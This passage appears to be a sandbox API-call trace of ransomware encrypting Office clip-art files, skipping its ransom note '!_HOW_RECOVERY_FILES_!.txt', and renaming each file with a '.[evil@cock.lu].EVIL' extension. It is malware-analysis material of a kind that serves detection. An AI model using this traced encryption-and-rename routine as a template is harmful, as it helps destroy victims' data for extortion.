[0108.073] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04235_.WMF") returned 0x0 [0108.073] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 0x45 [0108.073] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.075] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e7c, lpOverlapped=0x0) returned 1 [0108.277] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.277] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.277] _errno () returned 0x84b1160840 [0108.277] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.277] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e80, lpOverlapped=0x0) returned 1 [0108.277] CloseHandle (hObject=0x1a8) returned 1 [0108.277] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.278] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.278] __uncaught_exception () returned 0x84b1160800 [0108.278] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.278] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf.[evil@cock.lu].evil")) returned 1 [0108.279] ??_V@YAXPEAX@Z () returned 0x1 [0108.281] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF", dwFileAttributes=0x200) returned 0 [0108.281] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.282] wcsstr (_Str="AN04267_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.282] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 69 [0108.282] wcscmp (_String1="AN04267_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.282] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04267_.WMF") returned 0x0 [0108.282] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 0x45 [0108.282] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.284] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e7c, lpOverlapped=0x0) returned 1 [0108.288] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.288] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.288] _errno () returned 0x84b1160840 [0108.288] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.288] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e80, lpOverlapped=0x0) returned 1 [0108.288] CloseHandle (hObject=0x1a8) returned 1 [0108.289] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.289] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.289] __uncaught_exception () returned 0x84b1160800 [0108.289] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.289] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf.[evil@cock.lu].evil")) returned 1 [0108.290] ??_V@YAXPEAX@Z () returned 0x1 [0108.295] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF", dwFileAttributes=0x200) returned 0 [0108.295] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.350] wcsstr (_Str="AN04269_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.350] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 69 [0108.350] wcscmp (_String1="AN04269_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.350] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04269_.WMF") returned 0x0 [0108.350] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 0x45 [0108.350] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.352] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7e0, lpOverlapped=0x0) returned 1 [0108.355] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.355] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.355] _errno () returned 0x84b1160840 [0108.355] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.355] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x800, lpOverlapped=0x0) returned 1 [0108.355] CloseHandle (hObject=0x1a8) returned 1 [0108.355] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.356] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.356] __uncaught_exception () returned 0x84b1160800 [0108.356] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.356] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf.[evil@cock.lu].evil")) returned 1 [0108.357] ??_V@YAXPEAX@Z () returned 0x1 [0108.360] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF", dwFileAttributes=0x200) returned 0 [0108.361] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.361] wcsstr (_Str="AN04323_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.361] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 69 [0108.361] wcscmp (_String1="AN04323_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.361] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04323_.WMF") returned 0x0 [0108.361] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 0x45 [0108.361] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.363] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9bc, lpOverlapped=0x0) returned 1 [0108.366] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.366] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.366] _errno () returned 0x84b1160840 [0108.366] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.366] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9c0, lpOverlapped=0x0) returned 1 [0108.366] CloseHandle (hObject=0x1a8) returned 1 [0108.366] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.367] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.367] __uncaught_exception () returned 0x84b1160800 [0108.367] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.367] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf.[evil@cock.lu].evil")) returned 1 [0108.368] ??_V@YAXPEAX@Z () returned 0x1 [0108.371] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF", dwFileAttributes=0x200) returned 0 [0108.371] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.371] wcsstr (_Str="AN04326_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.371] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 69 [0108.371] wcscmp (_String1="AN04326_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.371] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04326_.WMF") returned 0x0 [0108.371] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 0x45 [0108.371] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.374] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd14, lpOverlapped=0x0) returned 1 [0108.377] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.377] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.377] _errno () returned 0x84b1160840 [0108.377] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.377] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd20, lpOverlapped=0x0) returned 1 [0108.377] CloseHandle (hObject=0x1a8) returned 1 [0108.377] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.378] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.378] __uncaught_exception () returned 0x84b1160800 [0108.378] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.378] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf.[evil@cock.lu].evil")) returned 1 [0108.379] ??_V@YAXPEAX@Z () returned 0x1 [0108.382] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF", dwFileAttributes=0x200) returned 0 [0108.382] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.382] wcsstr (_Str="AN04332_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.382] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 69 [0108.382] wcscmp (_String1="AN04332_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.382] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04332_.WMF") returned 0x0 [0108.382] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 0x45 [0108.382] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.384] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x10c8, lpOverlapped=0x0) returned 1 [0108.390] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.390] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.390] _errno () returned 0x84b1160840 [0108.390] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.390] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x10e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10e0, lpOverlapped=0x0) returned 1 [0108.390] CloseHandle (hObject=0x1a8) returned 1 [0108.390] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.391] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.391] __uncaught_exception () returned 0x84b1160800 [0108.391] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.391] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf.[evil@cock.lu].evil")) returned 1 [0108.392] ??_V@YAXPEAX@Z () returned 0x1 [0108.395] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF", dwFileAttributes=0x200) returned 0 [0108.395] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.395] wcsstr (_Str="AN04355_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.395] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 69 [0108.396] wcscmp (_String1="AN04355_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.396] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04355_.WMF") returned 0x0 [0108.396] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 0x45 [0108.396] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.398] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc9c, lpOverlapped=0x0) returned 1 [0108.401] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.401] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.401] _errno () returned 0x84b1160840 [0108.401] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.401] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xca0, lpOverlapped=0x0) returned 1 [0108.401] CloseHandle (hObject=0x1a8) returned 1 [0108.401] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.401] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.401] __uncaught_exception () returned 0x84b1160800 [0108.401] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.402] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf.[evil@cock.lu].evil")) returned 1 [0108.402] ??_V@YAXPEAX@Z () returned 0x1 [0108.406] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF", dwFileAttributes=0x200) returned 0 [0108.406] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.406] wcsstr (_Str="AN04369_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.406] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 69 [0108.406] wcscmp (_String1="AN04369_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.406] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04369_.WMF") returned 0x0 [0108.406] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 0x45 [0108.407] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.408] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x12c8, lpOverlapped=0x0) returned 1 [0108.411] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.411] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.411] _errno () returned 0x84b1160840 [0108.411] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.411] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x12e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x12e0, lpOverlapped=0x0) returned 1 [0108.411] CloseHandle (hObject=0x1a8) returned 1 [0108.411] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.411] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.411] __uncaught_exception () returned 0x84b1160800 [0108.411] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.412] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf.[evil@cock.lu].evil")) returned 1 [0108.412] ??_V@YAXPEAX@Z () returned 0x1 [0108.415] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF", dwFileAttributes=0x200) returned 0 [0108.415] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.415] wcsstr (_Str="AN04384_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.415] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 69 [0108.415] wcscmp (_String1="AN04384_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.415] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04384_.WMF") returned 0x0 [0108.415] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 0x45 [0108.415] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft 